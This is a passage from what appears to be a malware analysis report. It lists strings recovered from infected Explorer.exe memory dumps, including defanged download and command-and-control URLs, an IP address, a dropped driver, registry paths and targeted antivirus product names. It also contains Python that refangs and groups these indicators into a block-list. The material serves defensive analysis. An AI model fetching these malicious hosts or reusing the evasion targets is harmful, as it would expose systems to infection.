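            hits.append((m["ip"], m["url"], reasons))
    return hits


if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(ip, url[:60], alpha_payload_length(url), reasons)
```

The decoded alpha lengths (28 and 78 bytes for the two /mg requests) are only a sanity check that the parameter is well-formed base64; the plaintext is not recoverable from the capture, so the rule keys on host, path and User-Agent rather than on content.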
Strings from Dumps
Explorer.EXE_532_rwx_01E00000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.rsrc
.text
Explorer.EXE_532_rwx_01E10000_00001000:
|explorer.exeM_532_
Explorer.EXE_532_rwx_038F0000_0108E000:
c:\windows
hXXp://erenkarahan.com/images/logo.gif
hXXp://gutekpl.za.pl/logo.gif
hXXp://VVV.kapudane.com/logo.gif
hXXp://igorfomin.ru/logo.gif
hXXp://m2comunicacion.com/images/logo.gif
hXXp://leenaenterprises.com/img/logo.gif
hXXp://VVV.geriatriasinop.com.br/img/button.gif
hXXp://britishmotors.it/logo.gif
hXXp://artroom.com.tr/blog/logo.gif
hXXp://gammaconseil.fr/images/button.gif
hXXp://xexylia.com/logo.gif
%System%\drivers\olitq.sys
8317508876
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.rsrc
.text
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
KERNEL32.dll
USER32.dll
h.rdata
H.data
.reloc
ntoskrnl.exe
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
hXXp://
ipfltdrv.sys
VVV.microsoft.com
?%x=%d
&%x=%d
SYSTEM.INI
USER32.DLL
.%c%s
\\.\amsint32
NTDLL.DLL
autorun.inf
ADVAPI32.DLL
win%s.exe
%s.exe
WININET.DLL
InternetOpenUrlA
avast! Web Scanner
Avira AntiVir Premium WebGuard
cmdGuard
cmdAgent
Eset HTTP Server
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
Symantec Password Validation
WebrootDesktopFirewallDataService
WebrootFirewall
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
A2CMD.
ASHWEBSV.
AVGCC.AVGCHSVX.
DRWEB
DWEBLLIO
DWEBIO
FSGUIEXE.
MCVSSHLD.
NPFMSG.
SYMSPORT.
WEBSCANX.
.adata
M_%d_
%c%d_%d
?456789:;
!"#$%&'()* ,-./0123
GetProcessHeap
GetWindowsDirectoryA
RegEnumKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
SHFileOperationA
&3&3&3&389
.rdata
.data
rnl.exe?
= =$=(=,=0=4=8=
rv:1.9.2.3)
.NEtCLR
.klkjw:9fqwiBu
f3a.sysB
D6c.pBTab
drfig%s:*:
0}.T&?%x=
~UrlA'W
\'Web%
HTTP)s'PJ
o.ENHCD
KPCKwWEBWUPD
>*?456789:;
!"#$%&'()* ,-./01230 0
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
WS2_32.dll
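The dump strings above are printed in the report's defanged form (hXXp:// for http://, VVV for www) and mix URLs, driver and device names, registry paths, security-product names and printf-style templates. As an added example that is not part of this report, the Python below normalizes a constructed subset of those strings, deduplicates them and groups them into indicator categories, which is the first pass an analyst makes before turning a dump like this into block-list entries. The category names, the product-name list and the sample subset are this example's own choices, not the report's.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a subset of the dump strings above, kept in the
# report's defanged form, with one string repeated to mirror the listing.
DUMP_STRINGS = r"""
c:\windows
hXXp://erenkarahan.com/images/logo.gif
hXXp://VVV.kapudane.com/logo.gif
%System%\drivers\olitq.sys
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://
Software\Microsoft\Windows\CurrentVersion\policies\system
\\.\amsint32
autorun.inf
autorun.inf
win%s.exe
avast! Web Scanner
ipfltdrv.sys
SHELL32.DLL
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
"""

# Product names as they appear in the dump; used only to label a category.
SECURITY_PRODUCTS = ("avast!", "Avira", "Eset", "ProtoPort", "SpIDer",
                     "Symantec", "Webroot", "cmdGuard", "cmdAgent")


def refang(s):
    """Turn the report's defanged URL form back into a usable indicator."""
    s = re.sub(r"^hXXp(s?)://", r"http\1://", s)
    s = re.sub(r"^(https?://)VVV\.", r"\1www.", s)
    return s


def classify(s):
    """Map one dump string to an IOC category, or None if it is not an indicator."""
    if re.match(r"^hXXps?://", s):
        # A bare scheme such as 'hXXp://' carries no host and is skipped.
        return "url" if urlsplit(refang(s)).hostname else None
    if s.startswith("\\\\.\\"):
        return "device"
    if s.lower().endswith(".sys"):
        return "driver"
    if s.lower().endswith(".dll"):
        return "library"
    if re.match(r"^(software|system)\\", s, re.IGNORECASE):
        return "registry"
    if s.lower() == "autorun.inf":
        return "removable-media"
    if any(p in s for p in SECURITY_PRODUCTS):
        return "security-product"
    if s.startswith("Mozilla/"):
        return "user-agent"
    if re.search(r"%[sdcx]", s):
        return "format-string"
    return None


def extract_iocs(text):
    """Deduplicate and group dump strings by category; URLs are refanged."""
    iocs = {}
    for line in text.splitlines():
        s = line.strip()
        if not s:
            continue
        cat = classify(s)
        if cat is None:
            continue
        value = refang(s) if cat == "url" else s
        iocs.setdefault(cat, set()).add(value)
    return {cat: sorted(values) for cat, values in iocs.items()}


def hosts(iocs):
    """Distinct hostnames and IPs from the url category, for block-listing."""
    return sorted({urlsplit(u).hostname for u in iocs.get("url", [])})


if __name__ == "__main__":
    result = extract_iocs(DUMP_STRINGS)
    for cat, values in result.items():
        print(cat, values)
    print("hosts", hosts(result))
```

Format-string templates such as win%s.exe are kept in their own bucket on purpose: they describe how the sample builds names at runtime, and a literal match on them in a block-list would never fire.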